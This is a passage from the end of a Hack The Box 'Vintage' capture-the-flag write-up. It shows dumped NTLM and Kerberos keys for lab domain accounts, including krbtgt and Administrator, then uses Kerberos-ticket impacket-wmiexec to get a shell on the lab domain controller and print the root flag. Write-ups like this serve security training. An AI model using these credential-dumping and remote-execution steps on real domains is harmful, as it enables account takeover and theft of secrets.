FS01$:1108:aad3b435b51404eeaad3b435b51404ee:44a59c02ec44a90366ad1d0f8a781274:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:5f22c4cf44bc5277d90b8e281b9ba3735636bd95a72f3870ae3de93513ce63c5
Administrator:aes128-cts-hmac-sha1-96:c119630313138df8cd2e98b5e2d018f7
Administrator:des-cbc-md5:c4d5072368c27fba
krbtgt:aes256-cts-hmac-sha1-96:8d969dafdd00d594adfc782f13ababebbada96751ec4096bce85e122912ce1f0
krbtgt:aes128-cts-hmac-sha1-96:3c7375304a46526c00b9a7c341699bc0
krbtgt:des-cbc-md5:e923e308752658df
M.Rossi:aes256-cts-hmac-sha1-96:14d4ea3f6cd908d23889e816cd8afa85aa6f398091aa1ab0d5cd1710e48637e6
M.Rossi:aes128-cts-hmac-sha1-96:3f974cd6254cb7808040db9e57f7e8b4
M.Rossi:des-cbc-md5:7f2c7c982cd64361
R.Verdi:aes256-cts-hmac-sha1-96:c3e84a0d7b3234160e092f168ae2a19366465d0a4eab1e38065e79b99582ea31
R.Verdi:aes128-cts-hmac-sha1-96:d146fa335a9a7d2199f0dd969c0603fb
R.Verdi:des-cbc-md5:34464a58618f8938
L.Bianchi:aes256-cts-hmac-sha1-96:abcbbd86203a64f177288ed73737db05718cead35edebd26740147bd73e9cfed
L.Bianchi:aes128-cts-hmac-sha1-96:92067d46b54cdb11b4e9a7e650beb122
L.Bianchi:des-cbc-md5:01f2d667a19bce25
G.Viola:aes256-cts-hmac-sha1-96:f3b3398a6cae16ec640018a13a1e70fc38929cfe4f930e03b1c6f1081901844a
G.Viola:aes128-cts-hmac-sha1-96:367a8af99390ebd9f05067ea4da6a73b
G.Viola:des-cbc-md5:7f19b9cde5dce367
C.Neri:aes256-cts-hmac-sha1-96:c8b4d30ca7a9541bdbeeba0079f3a9383b127c8abf938de10d33d3d7c3b0fd06
C.Neri:aes128-cts-hmac-sha1-96:0f922f4956476de10f59561106aba118
C.Neri:des-cbc-md5:9da708a462b9732f
P.Rosa:aes256-cts-hmac-sha1-96:f9c16db419c9d4cb6ec6242484a522f55fc891d2ff943fc70c156a1fab1ebdb1
P.Rosa:aes128-cts-hmac-sha1-96:1cdedaa6c2d42fe2771f8f3f1a1e250a
P.Rosa:des-cbc-md5:a423fe64579dae73
svc_sql:aes256-cts-hmac-sha1-96:3bc255d2549199bbed7d8e670f63ee395cf3429b8080e8067eeea0b6fc9941ae
svc_sql:aes128-cts-hmac-sha1-96:bf4c77d9591294b218b8280c7235c684
svc_sql:des-cbc-md5:2ff4022a68a7834a
svc_ldap:aes256-cts-hmac-sha1-96:d5cb431d39efdda93b6dbcf9ce2dfeffb27bd15d60ebf0d21cd55daac4a374f2
svc_ldap:aes128-cts-hmac-sha1-96:cfc747dd455186dba6a67a2a340236ad
svc_ldap:des-cbc-md5:e3c48675a4671c04
svc_ark:aes256-cts-hmac-sha1-96:820c3471b64d94598ca48223f4a2ebc2491c0842a84fe964a07e4ee29f63d181
svc_ark:aes128-cts-hmac-sha1-96:55aec332255b6da8c1344357457ee717
svc_ark:des-cbc-md5:6e2c9b15bcec6e25
C.Neri_adm:aes256-cts-hmac-sha1-96:96072929a1b054f5616e3e0d0edb6abf426b4a471cce18809b65559598d722ff
C.Neri_adm:aes128-cts-hmac-sha1-96:ed3b9d69e24d84af130bdc133e517af0
C.Neri_adm:des-cbc-md5:5d6e9dd675042fa7
L.Bianchi_adm:aes256-cts-hmac-sha1-96:c67109aaa7f7ae3f0f157a411a5df035dddd9dc0ec723f32698c23ee27d35a91
L.Bianchi_adm:aes128-cts-hmac-sha1-96:a10f5e2bda76767b415194940562cd2e
L.Bianchi_adm:des-cbc-md5:68465b6edce0f101
DC01$:aes256-cts-hmac-sha1-96:f8ceb2e0ea58bf929e6473df75802ec8efcca13135edb999fcad20430dc06d4b
DC01$:aes128-cts-hmac-sha1-96:a8f037cb02f93e9b779a84441be1606a
DC01$:des-cbc-md5:c4f15ef8c4f43134
gMSA01$:aes256-cts-hmac-sha1-96:dbfcdca25386b9c81bae0459076539bb3886110b180e403000965e9c7fd9a8eb
gMSA01$:aes128-cts-hmac-sha1-96:d7482d566993f8c15211ad35367f2738
gMSA01$:des-cbc-md5:34fb4076ba6e49cb
FS01$:aes256-cts-hmac-sha1-96:d57d94936002c8725eab5488773cf2bae32328e1ba7ffcfa15b81d4efab4bb02
FS01$:aes128-cts-hmac-sha1-96:ddf2a2dcc7a6080ea3aafbdf277f4958
FS01$:des-cbc-md5:dafb3738389e205b
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up...
[*] Stopping service RemoteRegistry

We can finally claim the root flag with wmiexec using the same ticket; klist confirms it is a service ticket for cifs/dc01.vintage.htb as l.bianchi_adm, which is why the target must be addressed by that hostname:

┌──(kali㉿kali)-[~/Hackthebox/VIntage]
└─$ klist
Ticket cache: FILE:l.bianchi_adm@cifs_dc01.vintage.htb@VINTAGE.HTB.ccache
Default principal: l.bianchi_adm@VINTAGE.HTB

Valid starting Expires Service principal
12/02/2024 11:49:13 12/02/2024 21:48:45 cifs/dc01.vintage.htb@VINTAGE.HTB
renew until 12/03/2024 11:48:16

┌──(kali㉿kali)-[~/Hackthebox/VIntage]
└─$ impacket-wmiexec -k -no-pass VINTAGE.HTB/l.bianchi_adm@dc01.vintage.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type C:\Users\Administrator\Desktop\root.txt
32731b6a92aabfcdb4dd699efb4260c0

That was it for Vintage, hope you learned something new!
-0xkujen

  • Title: Hackthebox: Vintage
  • Author: Foued SAIDI
  • Created at : 2025-04-21 14:37:40
  • Updated at : 2025-04-22 11:48:50
  • Link: https://kujen5.github.io/2025/04/21/Hackthebox-Vintage/
  • License: This work is licensed under CC BY-NC-SA 4.0.